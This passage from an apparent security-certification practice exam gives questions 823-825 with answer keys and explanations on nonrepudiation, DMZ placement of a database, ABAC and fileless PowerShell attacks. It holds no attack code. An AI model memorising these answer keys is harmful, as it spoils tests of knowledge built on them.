Option A is wrong because availability ensures systems and data are accessible when needed, not that actions cannot be denied. Option C is wrong because confidentiality protects data from unauthorized disclosure, not from denial of actions. Option D is wrong because accountability tracks who performed an action (via user IDs and logs), but without a digital signature, it does not provide cryptographic proof that prevents the manager from repudiating the action; nonrepudiation is the stronger objective that includes accountability plus irrefutable evidence.

823
MCQmedium

A small company is redesigning its network for a public web application. The web front end must be reachable from the internet, but the database should never be exposed directly to external or general user traffic. Which architecture is the best choice?

A.Place both the web server and database in the same internal subnet and rely on host firewalls.
B.Place the web server in a DMZ and keep the database in a private internal subnet with only required application traffic allowed.
C.Place the database in the DMZ so the web server can query it directly without internal routing.
D.Keep both systems public but restrict access with NAT and strong administrator passwords.
AnswerB

This separates the internet-facing system from the sensitive backend. The DMZ limits exposure of the web server, while the database remains inaccessible from external networks and is reachable only over tightly filtered application ports from the web tier.

Why this answer

Option B is correct because it implements a layered security architecture: the web server resides in a DMZ (demilitarized zone) where it is reachable from the internet, while the database is placed in a private internal subnet with strict firewall rules that only allow the required application traffic (e.g., TCP port 3306 for MySQL or 1433 for MSSQL) from the web server. This ensures the database is never directly exposed to external or general user traffic, reducing the attack surface and preventing direct internet-based attacks on the database.

Exam trap

The trap here is that candidates may think host firewalls are sufficient for internal subnet isolation (Option A) or mistakenly believe placing the database in the DMZ simplifies routing (Option C), overlooking the fundamental security principle of defense in depth and the need to keep sensitive data stores off the internet-facing network.

How to eliminate wrong answers

Option A is wrong because placing both the web server and database in the same internal subnet exposes the database to any compromise of the web server or any internal host, and host firewalls alone are insufficient to prevent lateral movement or internal scanning. Option C is wrong because placing the database in the DMZ directly exposes it to the internet, defeating the purpose of isolation and making it vulnerable to direct attacks from external sources.

824
MCQmedium

Based on the exhibit, which access model best fits the business requirement without creating many custom roles?

A.RBAC, because every user can be placed into a fixed role that never changes.
B.ABAC, because access can be evaluated using user, resource, and environment attributes together.
C.DAC, because each file owner can decide access individually without any central rule engine.
D.MAC, because users should manually grant access to themselves when needed.
AnswerB

The exhibit requires decisions based on attributes such as department, clearance, project tags, and business unit. ABAC is built for that kind of dynamic rule set and avoids creating a separate role for every possible combination.

Why this answer

B is correct because Attribute-Based Access Control (ABAC) evaluates multiple attributes (user, resource, environment) to dynamically determine access, which fits a business requirement that needs flexible, context-aware permissions without creating many custom roles. Unlike RBAC, ABAC avoids role explosion by using policies that combine attributes, making it ideal for environments where access decisions depend on factors like time, location, or data sensitivity.

Exam trap

The trap here is that candidates often default to RBAC as the simplest model, but the question explicitly requires avoiding many custom roles, which RBAC would necessitate if the business needs are complex or dynamic, whereas ABAC provides attribute-based flexibility without role explosion.

How to eliminate wrong answers

Option A is wrong because RBAC requires predefined roles that are static; if the business needs change frequently, RBAC would require creating many custom roles to accommodate new access patterns, contradicting the requirement to avoid custom roles. Option C is wrong because DAC allows file owners to set permissions individually, which lacks centralized control and cannot efficiently enforce business-wide access policies without custom configurations per resource. Option D is wrong because MAC enforces access based on fixed labels (e.g., security clearances) and does not allow users to grant access to themselves; it is rigid and not suitable for dynamic, attribute-driven requirements.

825
MCQeasy

A user opens an attached document, and the endpoint security tool shows PowerShell running from memory with no new executable file written to disk. What type of attack is most likely?

A.Fileless attack
B.Ransomware
C.Rootkit
D.Logic bomb
AnswerA

Fileless attacks use legitimate tools or memory-only execution instead of dropping a visible malicious file.

Why this answer

The scenario describes PowerShell running from memory without a new executable file written to disk, which is the hallmark of a fileless attack. Fileless attacks leverage legitimate system tools like PowerShell, WMI, or .NET to execute malicious code directly in memory, bypassing traditional file-based detection mechanisms.

Exam trap

The trap here is that candidates may confuse 'fileless' with 'no malware at all' or think that any attack using PowerShell must be a script-based attack, but the key indicator is the lack of a new executable file on disk, which distinguishes fileless attacks from traditional malware that writes files.

How to eliminate wrong answers

Option B (Ransomware) is wrong because ransomware typically encrypts files and demands payment, often writing executable files to disk or dropping a ransom note; the absence of a new executable file on disk makes this unlikely. Option C (Rootkit) is wrong because rootkits are designed to hide their presence and maintain persistent access, often by modifying the operating system kernel or boot process, not by executing solely from memory without any file artifacts. Option D (Logic bomb) is wrong because a logic bomb is a piece of malicious code that executes under specific conditions (e.g., a date or user action) and is usually embedded within a legitimate file or application, not executed purely from memory without a file.

Page 10

Page 11 of 16

Page 12